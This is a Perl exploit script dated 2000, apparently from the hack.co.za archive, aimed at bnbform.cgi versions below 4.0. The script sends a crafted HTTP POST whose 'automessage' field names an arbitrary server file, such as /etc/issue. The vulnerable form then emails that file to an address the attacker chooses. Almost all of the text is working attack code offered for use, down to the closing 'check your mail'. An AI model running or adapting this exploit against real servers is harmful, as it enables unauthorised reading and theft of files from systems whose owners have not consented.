#!/usr/bin/perl -w ## bnbform.cgi exploit - discovered in Phrack55, ## article p55-07 by whisker author, rain.forest.puppy. ## The article is about Perl CGI problems, and is very ## interesting reading - well, done! This exploit will ## mail you any file readable by the httpd daemon. ## ## All version below bnbform v4.0 are vulnerable. ## ## ./bnbform.pl hell.no cgi-bin me me@mail.com /etc/issue ## ## - teleh0r@doglover.com / anno 2000 - ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 5) { print("Usage: $0 \n"); exit(1); } my($target,$cgidir,$name,$email,$file,$length, $agent,$command,$sploit,$iaddr,$paddr,$proto); ($target,$cgidir,$name,$email,$file) = @ARGV; print("\nRemote host: $target\n"); print("CGI-script: /$cgidir/bnbform.cgi\n"); print("File to retrieve: $file\n"); $file =~ s/\//%2F/g; $length = 186 + length($name.$email.$file); $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"; # heh ;) $command= "name=$name&submit_by=$email&required=name&data_order=name". "&autorespond=yes&automessage=$file&form_id=My+Test+Form"; $sploit= "POST /$cgidir/bnbform.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $command"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); print("\nAll done - check your mail.\n"); exit(0); # www.hack.co.za [26 July 2000]#